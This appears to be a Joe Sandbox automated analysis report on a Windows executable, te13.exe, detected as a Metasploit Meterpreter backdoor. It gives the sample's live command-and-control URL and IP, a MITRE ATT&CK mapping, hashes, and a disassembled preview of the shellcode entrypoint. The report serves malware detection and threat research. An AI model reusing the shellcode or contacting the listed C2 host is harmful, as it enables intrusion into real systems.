Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: Amcache.hve.3.dr	Binary or memory string: VMware
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: te13.exe, 00000000.00000002.1817115478.00000000004CA000.00000004.00000020.00020000.00000000.sdmp, te13.exe, 00000000.00000002.1817115478.0000000000541000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.3.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: Amcache.hve.3.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: MsMpEng.exe

Remote Access Functionality

Yara detected Metasploit Payload

Source: Yara match	File source: te13.exe, type: SAMPLE
Source: Yara match	File source: 0.2.te13.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.te13.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1818119914.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1660597941.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Process Injection	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 DLL Side-Loading	LSASS Memory	1 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Ingress Tool Transfer	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
te13.exe	89%	ReversingLabs	Win64.Backdoor.Meterpreter
te13.exe	100%	Avira	TR/Crypt.XPACK.Gen7
te13.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://softwareshop.win:8080/softwaresupport_te13/CZzbhEDNWAUwODE6Vw5_AwDdGU9BdUtaSSDbEU7hSesrtBCr7q_kJwC-7298sgwHxYzJIFi4J69iRGiDGCWYBXhDy4V3Q1PpsBVyHnnrQQO2HvS9YmK5IXAah-f3U0wsvMwb22THyduSWTr83RlCRF2pxtARUPlsxkv1xGslk6TUZZ6CuLPdePE_3WyeDnid	0%	Avira URL Cloud	safe
http://softwareshop.win:8080/softwaresupport_te13/CZzbhEDNWAUwODE6Vw5_AwDdGU9BdUtaSSDbEU7hSesrtBCr7q	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
softwareshop.win	104.21.16.1	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://softwareshop.win:8080/softwaresupport_te13/CZzbhEDNWAUwODE6Vw5_AwDdGU9BdUtaSSDbEU7hSesrtBCr7q_kJwC-7298sgwHxYzJIFi4J69iRGiDGCWYBXhDy4V3Q1PpsBVyHnnrQQO2HvS9YmK5IXAah-f3U0wsvMwb22THyduSWTr83RlCRF2pxtARUPlsxkv1xGslk6TUZZ6CuLPdePE_3WyeDnid	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.3.dr	false		high
http://softwareshop.win:8080/softwaresupport_te13/CZzbhEDNWAUwODE6Vw5_AwDdGU9BdUtaSSDbEU7hSesrtBCr7q	te13.exe, 00000000.00000002.1817115478.0000000000509000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.16.1	softwareshop.win	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585319
Start date and time:	2025-01-07 14:12:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	te13.exe
Detection:	MAL
Classification:	mal100.troj.winEXE@2/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.190.159.2, 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: te13.exe

Simulations

Behavior and APIs

Time	Type	Description
08:13:10	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.16.1	JNKHlxGvw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	New order 2025.msg	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://email.garagesalefinder.com/c/eJyMU92OsjoUfZp6xwRaoO2FF-XPYT4VnXHQ8caUFivK3wcC-vYnzImc25OQlbXYa-_VJrtyniCCZ-ncwMg2KKWmPrvMCRWYGDSBBAkLnSGigttEUJpiLHRhzLK5JRHWEbE0wS1LkxzqmpnKRCMYcymIhUyJgKkr3nCVtjxPz1kp0-ZNVMUsn1_u9xogBmAAYDAMw5uqKpWnXLZp02cibUcfgEHNVcolgAEX-Q2goOUAeUsAbZ4B5Lma-bXS9YjEH8_jUsCMDFHdh-8V6xawX6ug4FFt3FtnCCFin8wJow2-DWulyU1_iVhfsfe8SpYtI8px_iiPHZXv8Movh2Cj-95Hcj0kV7urV6jyYvatjOfWaYZ2MRxIba6V3Jx55O3PcZmp2muai3lerzYyDgu0zWKnNlb-o7Sf7h6p70NxCvM23_41HfOEGuWGy9q9Hnlqfep7pO0Kfgrvm-rvV7zTOloie11_fJdEol2uDrr9xfmOPrr1Vr-IJWM_mXjnt9SPV5IVx53pOD-UrUI1qHwX-N2-JfHP9ThUm97B9z_nIOnjcuOGjloo51Iwxy6FckMA7bIrAPIMAG2RSYA8a5H18gTbKy737aLto4f-0GD3DaDdZgogj0WebZ6M8IN8ys_TY2eziPTBe70KjWKtt8gaxll5lpZ3gDzBtbpLNBsalBgGNrFuUoTHOC67JgfIGzehnVYBQAtjAC37l8GRuSOYU4G-pG2NgEYgk_ReFjwWsPli0J_MwSSdVxuc_v2bYU25I0BvMvvT0fBL_tdrsyktMAglv0Qs4o5D0vHD8ZIUFG4XwVMUFP0UQcef1jWBOkDea447drMR_PHuZATmTlIH0KIMQPP3-3_uWTOv0_JWvWU9L6semDpvmmpIeHn7fYv9HP4TAAD__7e2IkM	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://check.qlkwr.com/awjsx.captcha?u=d9b43caa-60bc-4673-bed6-4e9abc0c0678	Get hash	malicious	Unknown	Browse	104.21.55.46
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc	Browse	188.114.96.3
	Crawl.exe	Get hash	malicious	Unknown	Browse	1.1.1.1
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Quarantined Messages(3).zip	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	U1P3u1tkB2.exe	Get hash	malicious	Unknown	Browse	104.21.80.209
	LVkAi4PBv6.exe	Get hash	malicious	Unknown	Browse	188.114.97.3

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_te13.exe_c48cbeabb6838b73a54ab796986b6ff6afe20c0_dd8ad63c_d90a66ee-d5b7-4325-aeea-4bf0f6e673c4\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.871868344826956
Encrypted:	false
SSDEEP:	96:dyHFRg+2s+hEoK7J9nQXIDcQtc6GcE5cw3Xxp+HbHg/KAgOg0dl/phsv5o1OyWCz:OF2v0jCjojZ/zuiFc5Z24lO8/
MD5:	C6CB9A4BF5819490878E3E86FBA8B3EE
SHA1:	0E4E3BD804CCDE9CE52112C6FA267C96DB9295BA
SHA-256:	BE372D813F9E583615AFB6D3B87803BBD70538D8D94E407E13D83FAC18019E14
SHA-512:	2CEE90159F6DFF8D61F8BCB7AF3F49FA24FBF194145D8C86C7B0A508A0E85AE1A6ADBD1E8E77B24E55C83E0879227F9F84A1607F429631B1E9F643F4EF13AB6E
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.7.2.9.1.7.6.1.8.5.6.6.6.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.7.2.9.1.7.6.5.7.6.2.8.7.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.9.0.a.6.6.e.e.-.d.5.b.7.-.4.3.2.5.-.a.e.e.a.-.4.b.f.0.f.6.e.6.7.3.c.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.a.d.9.0.d.a.-.d.b.a.a.-.4.b.3.c.-.8.0.4.3.-.e.e.3.e.b.3.a.1.e.1.0.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.t.e.1.3...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.4.8.-.0.0.0.1.-.0.0.1.4.-.e.e.1.7.-.3.9.d.d.0.5.6.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.a.0.f.a.a.2.0.5.2.2.9.c.4.d.6.a.0.1.6.0.c.6.1.e.7.3.5.0.b.6.d.0.0.0.0.f.f.f.f.!.0.0.0.0.1.a.e.d.f.1.5.1.6.1.6.0.0.2.3.f.f.a.e.b.e.c.2.e.0.2.8.8.3.8.6.a.f.5.c.9.1.a.1.b.!.t.e.1.3...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.0././.0.4././.1.4.:.2.2.:.0.6.:.5.3.!.e.5.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF4E.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Jan 7 13:12:56 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	134723
Entropy (8bit):	1.2978233326974307
Encrypted:	false
SSDEEP:	192:+diLCCd+07jCO/ojFjYoSdyV9lQekSZURBEt9rtNz7NgfTG:4/Q1QjFjYoSkV9lQNS2nErrtx7SfTG
MD5:	EF92C6EE6C70DAF6AE86D647FDCC91ED
SHA1:	FE64A8AFBC284B7C182D220C0834D0F6F76BD349
SHA-256:	8FC5DF3E7AE94B16555670E7E81E417024FFA9290FBA55F9AF6973F146D37E03
SHA-512:	B8B8788EC65295B8F91D79BF75409F050EA865B3F896DB53B48C38F5B1F00D39A3AACDE26359912733D1F901360D0E36D00F4FEE33A1F4A3151DFD3653684CC1
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......X(}g........................x...............\U..........T.......8...........T........... ,..#...........d...........P...............................................................................eJ..............Lw......................T.......H...W(}g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB00A.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8742
Entropy (8bit):	3.7029068577756536
Encrypted:	false
SSDEEP:	192:R6l7wVeJvRH7b6Y93AZrgmf1YpD089bbBUfrJm:R6lXJZ36YtAZrgmf10bCfo
MD5:	738324858C9CE4E2B42AA331AE793B48
SHA1:	6B7BCA090E2FD3E61AC2AF982B93E4DE5BFFB612
SHA-256:	D11B1FACF2D1514F5C2772527905ED2C962BCB12D783A46E81AD2E3D5859558F
SHA-512:	3572BE76ACF87C6017B76767D8F1A7027F338792F42EF66C4750D77533C2DD00046D51A47146E8DF7C8BEBDB0A39424E85EC7B3A395966A444937ADE56192B90
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.4.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB03A.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4654
Entropy (8bit):	4.4606970895736655
Encrypted:	false
SSDEEP:	48:cvIwWl8zsP0Jg771I9F/uWpW8VYnYm8M4JDtCOKFwZyq85ZguOxdnZgXAd:uIjfPyI7yP7VDJ5Caa/8dZgXAd
MD5:	3DA16F16077D8B07F2FA71AE15D81123
SHA1:	C2D161AB6E10A7F6114B92CFD735A8825F5C0FF2
SHA-256:	719297E22FDE33B82536B67351F58155112A1CEFDAA17B9E8DC7A06646053AE4
SHA-512:	DC436658FEED035469B7002D2396E788D7A3B384A8EFF926E250627A6918094442DD6E7AB73AFC51BE0E423A15C7A852911BB52A5B4C144362CE4372363E930B
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="665535" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.46543499069006
Encrypted:	false
SSDEEP:	6144:YIXfpi67eLPU9skLmb0b4wWSPKaJG8nAgejZMMhA2gX4WABl0uNSdwBCswSbC:NXD94wWlLZMM6YFH8+C
MD5:	BE3ED1B8D8EED162BC855358D1AF06E2
SHA1:	5D78D6E76844F87F3ED43B38427F4D26DA5B00DC
SHA-256:	62BF664A3919A9ECF37A7EC7B575361549048210FD320A8FD6DE5B68505B8EF7
SHA-512:	2F1447452D78E574B713409473B64604A09D7D97FFB89F8C051D41D0B19244D561A9A2F32BCA2D2350277D30F57600E676A4B51C705EEE1C128CBB7052B1CA37
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmz....a...............................................................................................................................................................................................................................................................................................................................................A..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	1.601812770860449
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	te13.exe
File size:	7'168 bytes
MD5:	7a2c49cbec37b52a946c0131fe4cd308
SHA1:	1aedf1516160023ffaebec2e0288386af5c91a1b
SHA256:	6d890c662047b30e7e5003daa3b6db782c40671b98a046a03828e61382f5c73e
SHA512:	c1eb7b38327bc2da5bb26753e7d3d41e87ec21e59044adf55e56ee08724b070a0116958abd8ffbaa186915bf8f9820f712b9d2d8408d24015bf6dd678ab02920
SSDEEP:	24:eFGStrJ9u0/6lqunZdfgBQAVoac+HKeCSJRpCAhYWbtL1i2svc8jxpmB:is05G4BQVR+HASJCAhYWLiXkpB
TLSH:	B3E1B70337452DF9C88A1A378AB6E10BB05CEF647F1FD7B9CA14160F25B6000AAB1A06
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9$..}E..}E..}E..Z...~E..}E~..E..t=..\|E..t=..\|E..Rich}E..................PE..d...}<.K..........#......0...........@.........@...

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x140004000
Entrypoint Section:	.agvr
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x4BC63C7D [Wed Apr 14 22:06:53 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b4c6fff030479aa3b12625be67bf4914

Entrypoint Preview

Instruction
cld
dec eax
and esp, FFFFFFF0h
call 00007F1740DD8141h
inc ecx
push ecx
inc ecx
push eax
push edx
push ecx
push esi
dec eax
xor edx, edx
dec eax
mov edx, dword ptr [edx+60h]
dec eax
mov edx, dword ptr [edx+18h]
dec eax
mov edx, dword ptr [edx+20h]
dec eax
mov esi, dword ptr [edx+50h]
dec eax
movzx ecx, word ptr [edx+4Ah]
dec ebp
xor ecx, ecx
dec eax
xor eax, eax
lodsb
cmp al, 61h
jl 00007F1740DD8074h
sub al, 20h
inc ecx
ror ecx, 0Dh
inc ecx
add ecx, eax
loop 00007F1740DD805Fh
push edx
dec eax
mov edx, dword ptr [edx+20h]
inc ecx
push ecx
mov eax, dword ptr [edx+3Ch]
dec eax
add eax, edx
cmp word ptr [eax+18h], 020Bh
jne 00007F1740DD80E8h
mov eax, dword ptr [eax+00000088h]
dec eax
test eax, eax
je 00007F1740DD80D9h
dec eax
add eax, edx
inc esp
mov eax, dword ptr [eax+20h]
mov ecx, dword ptr [eax+18h]
dec ecx
add eax, edx
push eax
jecxz 00007F1740DD80C8h
dec eax
dec ecx
inc ecx
mov esi, dword ptr [eax+ecx*4]
dec ebp
xor ecx, ecx
dec eax
add esi, edx
dec eax
xor eax, eax
lodsb
inc ecx
ror ecx, 0Dh
inc ecx
add ecx, eax
cmp al, ah
jne 00007F1740DD8063h
dec esp
add ecx, dword ptr [esp+08h]
inc ebp
cmp ecx, edx
jne 00007F1740DD804Ah
pop eax
inc esp
mov eax, dword ptr [eax+24h]
dec ecx
add eax, edx
inc cx
mov ecx, dword ptr [eax+ecx*2]
inc esp
mov eax, dword ptr [eax+1Ch]
dec ecx
add eax, edx
inc ecx
mov eax, dword ptr [eax+ecx*4]
inc ecx
pop eax
inc ecx
pop eax
dec eax
add eax, edx
pop esi
pop ecx
pop edx
inc ecx
pop eax
inc ecx
pop ecx
inc ecx
pop edx
dec eax
sub esp, 20h
inc ecx

Rich Headers

Programming Language:

[IMP] VS2005 build 50727
[ASM] VS2008 SP1 build 30729
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x42e8	0x6c	.agvr
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4358	0x8	.agvr
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x104e	0x1200	a4a5deae25708a9e05f50bcad7075c86	False	0.025390625	data	0.16810049402497224	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x3000	0x84	0x200	44fe371fc666d82c2ad25fe8f8d00a8b	False	0.15625	data	0.9669929845987311	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
